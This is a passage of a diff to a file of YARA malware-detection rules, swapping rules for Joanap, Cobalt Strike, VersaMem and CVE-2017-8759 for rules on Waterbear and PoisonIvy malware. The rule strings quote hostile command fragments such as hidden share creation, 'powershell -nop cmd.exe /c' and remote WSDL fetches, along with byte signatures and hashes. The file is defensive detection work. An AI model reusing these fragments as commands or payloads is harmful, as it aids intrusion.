 		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA18-149A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ta18_149A.yar#L13-L34"
+		reference = "https://goo.gl/L9g9eR"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbear.yar#L11-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "746c74713ac52f62d5a5c41d2c9321e00481a45aa2c23f1695fab0f5b6d5dfb4"
+		logic_hash = "f1d5bd0c9f85dd90217bdbd7e44100bcfbf77839f83416ad17121713c189b9fd"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ea46ed5aed900cd9f01156a1cd446cbb3e10191f9f980e9f710ea1c20440c781"
+		hash1 = "dd3676f478ee6f814077a12302d38426760b0701bb629f413f7bf2ec71319db5"
 
 	strings:
-		$x1 = "cmd.exe /q /c net share adnim$" ascii
-		$x2 = "\\\\%s\\adnim$\\system32\\%s" fullword ascii
-		$s1 = "SMB_Dll.dll" fullword ascii
-		$s2 = "%s User or Password is not correct!" fullword ascii
-		$s3 = "perfw06.dat" fullword ascii
+		$s1 = "\\Release\\svc.pdb" ascii
+		$s2 = "svc.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "f0087d7b90876a2769f2229c6789fcf3" or 1 of ( $x* ) or 2 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
 }
-
-rule SIGNATURE_BASE_APT_TA18_149A_Joanap_Sample2 : FILE
+rule SIGNATURE_BASE_Waterbear_2_Jun17 : FILE
 {
 	meta:
-		description = "Detects malware from TA18-149A report by US-CERT"
+		description = "Detects malware from Operation Waterbear"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9f4e6e6c-ee2b-5fa3-bf85-5a1652b38c52"
-		date = "2018-05-30"
+		id = "d3178f01-90a8-5a82-9c95-40bf8e9b567f"
+		date = "2017-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA18-149A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ta18_149A.yar#L36-L55"
+		reference = "https://goo.gl/L9g9eR"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbear.yar#L27-L43"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "046135e4a1161841835cd9d10e13224b440e914ce3f409bad84a1df2638a7d5f"
+		logic_hash = "ec0b8d7313f925adafb7f03c8b7fd12c0176b75c74c642eeee900e911e0662a7"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "077d9e0e12357d27f7f0c336239e961a7049971446f7a3f10268d9439ef67885"
+		hash1 = "dcb5c350af76c590002a8ea00b01d862b4d89cccbec3908bfe92fdf25eaa6ea4"
 
 	strings:
-		$s1 = "%SystemRoot%\\system32\\svchost.exe -k Wmmvsvc" fullword ascii
-		$s2 = "%SystemRoot%\\system32\\svchost.exe -k SCardPrv" fullword ascii
-		$s3 = "%SystemRoot%\\system32\\Wmmvsvc.dll" fullword ascii
-		$s4 = "%SystemRoot%\\system32\\scardprv.dll" fullword ascii
+		$s1 = "downloading movie" fullword ascii
+		$s2 = "name=\"test.exe\"/>" fullword ascii
+		$s3 = "<description>Test Application</description>" fullword ascii
+		$s4 = "UI look 2003" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "e8cd12071a8e823ebc434c8ee3e23203" or 2 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
 }
-
-rule SIGNATURE_BASE_APT_TA18_149A_Joanap_Sample3 : FILE
+rule SIGNATURE_BASE_Waterbear_4_Jun17 : FILE
 {
 	meta:
-		description = "Detects malware from TA18-149A report by US-CERT"
+		description = "Detects malware from Operation Waterbear"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1c2551bc-01dd-5b30-a4cc-703a868cde73"
-		date = "2018-05-30"
+		id = "c7941f92-12ee-5d57-b58e-c8caf74ca6ba"
+		date = "2017-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA18-149A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ta18_149A.yar#L57-L78"
+		reference = "https://goo.gl/L9g9eR"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbear.yar#L45-L68"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a3da6c70d2ab94820324a55f1bcdcf5507a8ddf26efc80904daf0d9b27ac9312"
+		logic_hash = "46c43dbdcbc183995a8cd00c9888afcdd3adb9f3caf38ed42a0af1e7df39715f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a1c483b0ee740291b91b11e18dd05f0a460127acfc19d47b446d11cd0e26d717"
+		hash1 = "2e9cb7cadb3478edc9ef714ca4ddebb45e99d35386480e12792950f8a7a766e1"
 
 	strings:
-		$s1 = "mssvcdll.dll" fullword ascii
-		$s2 = "https://www.google.com/index.html" fullword ascii
-		$s3 = "LOGINDLG" fullword wide
-		$s4 = "rundll" fullword ascii
-		$s5 = "%%s\\%%s%%0%dd.%%s" fullword ascii
-		$s6 = "%%s\\%%s%%0%dd" fullword ascii
+		$x1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" fullword ascii
+		$s1 = "Wininet.dll InternetOpenA InternetConnectA HttpOpenRequestA HttpSendRequestA HttpQueryInfoA InternetReadFile InternetCloseHandle" fullword ascii
+		$s2 = "read from pipe:%s" fullword ascii
+		$s3 = "delete pipe" fullword ascii
+		$s4 = "cmdcommand:%s" fullword ascii
+		$s5 = "%s /c del %s" fullword ascii
+		$s6 = "10.0.0.250" fullword ascii
+		$s7 = "Vista/2008" fullword ascii
+		$s8 = "%02X%02X%02X%02X%02X%02X%04X" fullword ascii
+		$s9 = "UNKOWN" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "f6f7b2e00921129d18061822197111cd" or 3 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 3 of them )
 }
-rule SIGNATURE_BASE_HKTL_Cobaltstrike_Sleepmask_Jul22
+rule SIGNATURE_BASE_Waterbear_5_Jun17 : FILE
 {
 	meta:
-		description = "Detects static bytes in Cobalt Strike 4.5 sleep mask function that are not obfuscated"
-		author = "CodeX"
-		id = "d396ab0e-b584-5a7c-8627-5f318a20f9dd"
-		date = "2022-07-04"
+		description = "Detects malware from Operation Waterbear"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f92fe6d5-0afa-50a1-bdcf-c6dd78aa6809"
+		date = "2017-06-23"
+		modified = "2023-01-07"
+		reference = "https://goo.gl/L9g9eR"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbear.yar#L70-L90"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		logic_hash = "a1572db08242fffadedbfb89f3652b2eb93c910f3b61f9db0622bc18d069827c"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		hash1 = "d3678cd9744b3aedeba23a03a178be5b82d5f8059a86f816007789a9dd06dc7d"
+
+	strings:
+		$a1 = "ICESWORD" fullword ascii
+		$a2 = "klog.dat" fullword ascii
+		$s1 = "\\cswbse.dll" ascii
+		$s2 = "WIRESHARK" fullword ascii
+		$s3 = "default_zz|" fullword ascii
+		$s4 = "%c4%u-%.2u-%.2u %.2u:%.2u" fullword ascii
+		$s5 = "1111%c%s" fullword ascii
+
+	condition:
+		( uint16( 0 ) == 0x3d53 and filesize < 100KB and ( all of ( $a* ) or 3 of them ) )
+}
+rule SIGNATURE_BASE_Waterbear_6_Jun17 : FILE
+{
+	meta:
+		description = "Detects malware from Operation Waterbear"
+		author = "Florian Roth (Nextron Systems)"
+		id = "86d203be-2d3a-54f2-b851-9080d5be36f5"
+		date = "2017-06-23"
 		modified = "2023-12-05"
-		reference = "https://codex-7.gitbook.io/codexs-terminal-window/blue-team/detecting-cobalt-strike/sleep-mask-kit-iocs"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cobaltstrike.yar#L3-L15"
+		reference = "https://goo.gl/L9g9eR"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbear.yar#L92-L106"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "233b3cb441f45f400c0261589aac31dd1fcd9c4e3a86a6aaa46c60849063b34b"
-		score = 80
+		logic_hash = "af5c2a29e0a62c54e706492ae85b9786a6d9e5f42fe4d9c43693576e1a63b825"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "409cd490feb40d08eb33808b78d52c00e1722eee163b60635df6c6fe2c43c230"
 
 	strings:
-		$sleep_mask = { 48 8B C4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 45 33 DB 45 33 D2 33 FF 33 F6 48 8B E9 BB 03 00 00 00 85 D2 0F 84 81 00 00 00 0F B6 45 }
+		$s1 = "svcdll.dll" fullword ascii
+		$s2 = "log.log" fullword ascii
 
 	condition:
-		$sleep_mask
+		( uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_JAVA_Versamem_JAR_Aug24_1 : FILE
+rule SIGNATURE_BASE_Waterbear_7_Jun17 : FILE
 {
 	meta:
-		description = "Detects VersaMem Java webshell samples (as used by Volt Typhoon)"
-		author = "blacklotuslabs (modified by Florian Roth and X__Junior)"
-		id = "9b666e61-cfa8-58b3-a362-772cd907c57c"
-		date = "2024-08-27"
-		modified = "2024-08-29"
-		reference = "https://x.com/ryanaraine/status/1828440883315999117"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_volttyphoon_versamem.yar#L2-L24"
+		description = "Detects malware from Operation Waterbear"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4613df5b-495e-5738-9b7f-ac8ff586cd17"
+		date = "2017-06-23"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/L9g9eR"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbear.yar#L108-L125"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d21558eb6c8e700b8a4cb86fdaa5487179828152af68828e878397859d6d3952"
+		logic_hash = "6a760abca78e799b194864ad56457ccb0b05123307da6bfcad0c66da47f485a1"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6891aa78524e442f4dda66dff51db9798e1f92e6fefcdf21eb870b05b0293134"
 
 	strings:
-		$sa1 = "com.versa.vnms.ui.TestMain"
-		$sa2 = "captureLoginPasswordCode"
-		$sa3 = "com/versa/vnms/ui/services/impl/VersaAuthenticationServiceImpl"
-		$sa4 = "/tmp/.temp.data"
-		$sa5 = "getInsertCode"
-		$sa6 = "VersaMem"
-		$sa7 = "Versa-Auth"
-		$sb1 = "/tmp/.java_pid"
-		$sb2 = {2f 75 73 72 2f 62 69 6e 2f 70 67 72 65 70 01 00 02 2d 66 01 00 25 6f 72 67 2e 61 70 61 63 68 65 2e 63 61 74 61 6c 69 6e 61 2e 73 74 61 72 74 75 70 2e 42 6f 6f 74 73 74 72 61 70 07}
+		$s1 = "Bluthmon.exe" fullword wide
+		$s2 = "Motomon.exe" fullword wide
+		$s3 = "%d.%s%d%d%d" fullword ascii
+		$s4 = "mywishes.hlp" fullword ascii
+		$s5 = "filemon.rtf" fullword ascii
 
 	condition:
-		filesize < 5MB and ( 3 of them or all of ( $sb* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 80KB and all of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_JAVA_Versamem_JAR_Aug24_2 : FILE
+rule SIGNATURE_BASE_Waterbear_8_Jun17 : FILE
 {
 	meta:
-		description = "Detects VersaMem Java webshell samples (as used by Volt Typhoon)"
-		author = "Florian Roth"
-		id = "5ca598ed-5d0a-563d-a5e8-f8229af2c949"
-		date = "2024-08-29"
-		modified = "2024-12-12"
-		reference = "https://x.com/craiu/status/1828687700884336990"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_volttyphoon_versamem.yar#L27-L43"
+		description = "Detects malware from Operation Waterbear"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5ebeda22-ad67-5715-b42f-9b4bb5dcde94"
+		date = "2017-06-23"
+		modified = "2023-01-07"
+		reference = "https://goo.gl/L9g9eR"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbear.yar#L127-L145"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0bdf3bf5130c51c1355f179704933ca473a702595c580642035c8d3b9aad5725"
+		logic_hash = "3b1dfe486ea141342f253963ce6cc1e73d063ce880cf2fcee1aaa6aa6e919349"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
-		hash1 = "4bcedac20a75e8f8833f4725adfc87577c32990c3783bf6c743f14599a176c37"
+		hash1 = "bd06f6117a0abf1442826179f6f5e1932047b4a6c14add9149e8288ab4a902c3"
+		hash1 = "5dba8ddf05cb204ef320a72a0c031e55285202570d7883f2ff65135ec35b3dd0"
 
 	strings:
-		$x1 = "tomcat_memShell" ascii
-		$x2 = "versa/vnms/ui/config/" ascii fullword
+		$s1 = "Update.dll" fullword ascii
+		$s2 = "ADVPACK32.DLL" fullword wide
+		$s3 = "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Services\\" ascii
+		$s4 = "\\drivers\\sftst.sys" ascii
+		$s5 = "\\\\.\\SFilter" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x4b50 and filesize < 3000KB and 1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 40KB and all of them )
 }
-rule SIGNATURE_BASE_CVE_2017_8759_Mal_HTA : CVE_2017_8759 FILE
+rule SIGNATURE_BASE_Waterbear_9_Jun17 : FILE
 {
 	meta:
-		description = "Detects malicious files related to CVE-2017-8759 - file cmd.hta"
+		description = "Detects malware from Operation Waterbear"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e53b5149-fc94-5da5-8e35-7f09a9cd79fd"
-		date = "2017-09-14"
+		id = "727cdb55-ede5-5520-9aa9-5a265b5aeba1"
+		date = "2017-06-23"
 		modified = "2023-12-05"
-		reference = "https://github.com/Voulnet/CVE-2017-8759-Exploit-sample"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2017_8759.yar#L11-L24"
+		reference = "https://goo.gl/L9g9eR"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbear.yar#L147-L166"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f98578104e411fcf75a46f8a0bc3e561c94d0ca4ad7c1aae2595d03a29efd74e"
+		logic_hash = "b54f3032b31c5a48e879e49bd97adf3222db46a7789afc4ea2f5eca32536a2e4"
 		score = 75
 		quality = 85
-		tags = "CVE-2017-8759, FILE"
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fee2ab286eb542c08fdfef29fabf7796a0a91083a0ee29ebae219168528294b5"
+		hash1 = "fc74d2434d48b316c9368d3f90fea19d76a20c09847421d1469268a32f59664c"
 
 	strings:
-		$x1 = "Error = Process.Create(\"powershell -nop cmd.exe /c" fullword ascii
+		$s1 = "ADVPACK32.DLL" fullword wide
+		$s2 = "ADVPACK32" fullword wide
+		$a1 = "U2_Dll.dll" fullword ascii
+		$b1 = "ProUpdate" fullword ascii
+		$b2 = "Update.dll" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x683c and filesize < 1KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 30KB and all of ( $s* ) and ( $a1 or all of ( $b* ) )
 }
-rule SIGNATURE_BASE_CVE_2017_8759_Mal_Doc : CVE_2017_8759 FILE
+rule SIGNATURE_BASE_Waterbear_10_Jun17 : FILE
 {
 	meta:
-		description = "Detects malicious files related to CVE-2017-8759 - file Doc1.doc"
+		description = "Detects malware from Operation Waterbear"
 		author = "Florian Roth (Nextron Systems)"
-		id = "48587c13-7661-5987-8331-732115f7823b"
-		date = "2017-09-14"
-		modified = "2023-11-21"
-		reference = "https://github.com/Voulnet/CVE-2017-8759-Exploit-sample"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2017_8759.yar#L26-L45"
+		id = "1219c3e6-1001-5075-b7fc-e0d8a7de6a65"
+		date = "2017-06-23"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/L9g9eR"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbear.yar#L168-L182"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0c81feebef463fee41661ca951a39ee789db5d36acc8262ddb391609d8680108"
+		logic_hash = "1e71a317f782b73c876f0cb5fee25b69d8f1c45c20c58e4f204b7aeb7484cf14"
 		score = 75
 		quality = 85
-		tags = "CVE-2017-8759, FILE"
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6314c5696af4c4b24c3a92b0e92a064aaf04fd56673e830f4d339b8805cc9635"
+		hash1 = "3b1e67e0e86d912d7bc6dee5b0f801260350e8ce831c93c3e9cfe5a39e766f41"
 
 	strings:
-		$s1 = "soap:wsdl=http://" ascii wide
-		$s2 = "soap:wsdl=https://" ascii wide
-		$s3 = "soap:wsdl=http%3" ascii wide
-		$s4 = "soap:wsdl=https%3" ascii wide
-		$c1 = "Project.ThisDocument.AutoOpen" fullword wide
+		$s1 = "ADVPACK32.DLL" fullword wide
+		$s5 = "ADVPACK32" fullword wide
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and filesize < 500KB and ( 1 of ( $s* ) and $c1 )
+		( uint16( 0 ) == 0x5a4d and filesize < 30KB and all of them )
 }
-rule SIGNATURE_BASE_CVE_2017_8759_SOAP_Via_JS : FILE
+rule SIGNATURE_BASE_Waterbear_11_Jun17 : FILE
 {
 	meta:
-		description = "Detects SOAP WDSL Download via JavaScript"
+		description = "Detects malware from Operation Waterbear"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9e96cea3-4282-5f25-ad37-51bd69258790"
-		date = "2017-09-14"
+		id = "d7eb7561-c84e-5149-920c-35ad225ca8a9"
+		date = "2017-06-23"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/buffaloverflow/status/907728364278087680"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2017_8759.yar#L47-L61"
+		reference = "https://goo.gl/L9g9eR"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbear.yar#L185-L201"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3c170479283fe859b9ecfba4834396aaf78b375472250a4b188bc913f69c97fd"
-		score = 60
-		quality = 81
+		logic_hash = "ea61c348847614ad2872bfd385f433c5a30c7f6b5f5a2f135a7d83c553157ccd"
+		score = 75
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b046b2e2569636c2fc3683a0da8cfad25ff47bc304145be0f282a969c7397ae8"
 
 	strings:
-		$s1 = "GetObject(\"soap:wsdl=https://" ascii wide nocase
-		$s2 = "GetObject(\"soap:wsdl=http://" ascii wide nocase
+		$s1 = "/Pages/%u.asp" fullword wide
+		$s2 = "NVIDIA Corporation." fullword wide
+		$s3 = "tqxbLc|fP_{eOY{eOX{eO" fullword ascii
+		$s4 = "Copyright (C) 2005" fullword wide
 
 	condition:
-		( filesize < 3KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
 }
-rule SIGNATURE_BASE_CVE_2017_8759_SOAP_Excel : CVE_2017_8759 FILE
+rule SIGNATURE_BASE_Waterbear_12_Jun17 : FILE
 {
 	meta:
-		description = "Detects malicious files related to CVE-2017-8759"
+		description = "Detects malware from Operation Waterbear"
 		author = "Florian Roth (Nextron Systems)"
-		id = "940ec910-49a4-5271-97e4-8536db271b80"
-		date = "2017-09-15"
+		id = "cc0a071c-c409-57a2-80c5-dd93ca7db339"
+		date = "2017-06-23"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/buffaloverflow/status/908455053345869825"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2017_8759.yar#L63-L76"
+		reference = "https://goo.gl/L9g9eR"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbear.yar#L203-L217"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "adea595b251796e93cdc54cc59198d88a68e28d42899c90721f63f6813df24fe"
-		score = 60
-		quality = 83
-		tags = "CVE-2017-8759, FILE"
+		logic_hash = "343e6f36190372cd5599a84834edc3935d27a1e01aeab53c5765598b5b4071fe"
+		score = 75
+		quality = 85
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "15d9db2c90f56cd02be38e7088db8ec00fc603508ec888b4b85d60d970966585"
 
 	strings:
-		$s1 = "|'soap:wsdl=" ascii wide nocase
+		$s1 = "O_PROXY" fullword ascii
+		$s2 = "XMODIFY" fullword ascii
 
 	condition:
-		( filesize < 300KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
 }
-rule SIGNATURE_BASE_CVE_2017_8759_SOAP_Txt : CVE_2017_8759 FILE
+rule SIGNATURE_BASE_Waterbear_13_Jun17 : FILE
 {
 	meta:
-		description = "Detects malicious file in releation with CVE-2017-8759 - file exploit.txt"
+		description = "Detects malware from Operation Waterbear"
 		author = "Florian Roth (Nextron Systems)"
-		id = "36474420-4fa9-5264-a46b-bb2434624710"
-		date = "2017-09-14"
+		id = "425aaed4-879e-5caf-808b-14de98f628e8"
+		date = "2017-06-23"
 		modified = "2023-12-05"
-		reference = "https://github.com/Voulnet/CVE-2017-8759-Exploit-sample"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2017_8759.yar#L78-L92"
+		reference = "https://goo.gl/L9g9eR"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbear.yar#L219-L243"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "184179006ed2ac2ad76e09c53196805fcb1b7380dab1d5740b4469a89d6b0b32"
+		logic_hash = "b34c3d643309b8bbaa122a753e7f58dd9340cfa33962dbab1454c8080afd1664"
 		score = 75
-		quality = 60
-		tags = "CVE-2017-8759, FILE"
+		quality = 85
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "840ad14e29144be06722aff4cc04b377364eeed0a82b49cc30712823838e2444"
+		super_rule = 1
+		hash1 = "734e5972ab5ac1e9bc5470c666a55e0d2bd57c4e2ea2da11dc9bf56fb2ea6f23"
+		hash2 = "8bde3f71575aa0d5f5a095d9d0ea10eceadba38be888e10d3ca3776f7b361fe7"
+		hash3 = "c4b3b0a7378bfc3824d4178fd7fb29475c42ab874d69abdfb4898d0bcd4f8ce1"
 
 	strings:
-		$s1 = /<soap:address location="http[s]?:\/\/[^"]{8,140}.hta"/ ascii wide
-		$s2 = /<soap:address location="http[s]?:\/\/[^"]{8,140}mshta.exe"/ ascii wide
+		$s1 = "%WINDIR%\\PCHealth\\HelpCtr\\Binaries\\pchsvc.dll" fullword ascii
+		$s2 = "brnew.exe" fullword ascii
+		$s3 = "ChangeServiceConfig failed (%d)" fullword ascii
+		$s4 = "Proxy %d:%s %d" fullword ascii
+		$s5 = "win9807.tmp" fullword ascii
+		$s7 = "Service stopped successfully" fullword ascii
+		$s8 = "current dns:%s" fullword ascii
+		$s9 = "%c%u|%u|%u|%u|%u|" fullword ascii
+		$s10 = "[-]send %d: " fullword ascii
 
 	condition:
-		( filesize < 200KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 4 of them )
 }
-rule SIGNATURE_BASE_CVE_2017_8759_WSDL_In_RTF : CVE_2017_8759 FILE
+rule SIGNATURE_BASE_Waterbear_14_Jun17 : FILE
 {
 	meta:
-		description = "Detects malicious RTF file related CVE-2017-8759"
-		author = "Security Doggo @xdxdxdxdoa"
-		id = "daaa5489-af96-5a69-b2dd-81406c0a1edc"
-		date = "2017-09-15"
+		description = "Detects malware from Operation Waterbear"
+		author = "Florian Roth (Nextron Systems)"
+		id = "515d9400-3e2e-5ee5-a7dd-b313125c6482"
+		date = "2017-06-23"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/xdxdxdxdoa/status/908665278199996416"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2017_8759.yar#L94-L110"
+		reference = "https://goo.gl/L9g9eR"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbear.yar#L245-L261"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "47adc7adfc55239792aef818648546adb1627e74690de0d811100cc49aab8c2f"
+		logic_hash = "9ebe46590556e8eba2eef1c007549f6141c917bab97d46a0d58eca56257e24e2"
 		score = 75
 		quality = 85
-		tags = "CVE-2017-8759, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "00a1068645dbe982a9aa95e7b8202a588989cd37de2fa1b344abbc0102c27d05"
+		hash2 = "53330a80b3c4f74f3f10a8621dbef4cd2427723e8b98c5b7aed58229d0c292ba"
+		hash3 = "bdcb23a82ac4eb1bc9254d77d92b6f294d45501aaea678a3d21c8b188e31e68b"
 
 	strings:
-		$doc = "d0cf11e0a1b11ae1"
-		$obj = "\\objupdate"
-		$wsdl = "7700730064006c003d00" nocase
-		$http1 = "68007400740070003a002f002f00" nocase
-		$http2 = "680074007400700073003a002f002f00" nocase
-		$http3 = "6600740070003a002f002f00" nocase
+		$s1 = "my.com/msg/util/sgthash" fullword ascii
+		$s2 = "C:\\recycled" fullword ascii
 
 	condition:
-		uint32be( 0 ) == 0x7B5C7274 and $obj and $doc and $wsdl and 1 of ( $http* )
+		( uint16( 0 ) == 0x5a4d and filesize < 8000KB and all of them )
 }
-rule SIGNATURE_BASE_APT_APT41_POISONPLUG_3 : FILE
+rule SIGNATURE_BASE_Poisonivy_Sample_APT : FILE
 {
 	meta:
-		description = "Detects APT41 malware POISONPLUG"
+		description = "Detects a PoisonIvy APT malware group"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e150dd69-c611-53de-9c7d-de28d3a208dc"
-		date = "2019-08-07"
+		id = "8d3b8222-8949-57dc-99b7-092189416efd"
+		date = "2015-06-03"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt41.yar#L14-L31"
+		reference = "VT Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_poisonivy.yar#L2-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
